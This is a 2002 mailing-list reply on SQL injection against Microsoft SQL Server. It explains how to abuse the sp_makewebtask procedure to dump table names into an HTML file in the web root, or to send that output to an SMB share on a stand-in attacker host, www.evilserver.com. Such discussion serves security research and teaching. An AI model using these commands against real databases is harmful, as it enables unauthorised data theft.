Re: SQL Injection - retrieving all rows

From: Kevin Spett (kspettat_private)
Date: Wed Mar 20 2002 - 19:00:03 PST

    See if you can access sp_makewebtask.  It builds an html table with the
    output of your query.  It's installed by default without any kind of access
    control.  It works like this:
         sp_makewebtask 'c:\inetpub\wwwroot\sqloutput.html', 'SELECT name FROM
    sysobjects WHERE xtype=''U'''
        (I'm pretty sure in SQL Server to use quoted parameters inside of quotes
    you double single quotes, not double quotes.)
    You can even specify a UNC path for the output file, like this:
         sp_makewebtask '\\www.evilserver.com\publicshare\sqloutput.html',
    'SELECT name FROM sysobjects WHERE xtype=''U'''
    The directory "publicshare" needs to be a wide open SMB share... if any kind
    of authentication challenge is present, the file won't be recieved.

    If that fails, you could use a perl or python script.

    Kevin Spett
    SPI Dynamics, Inc.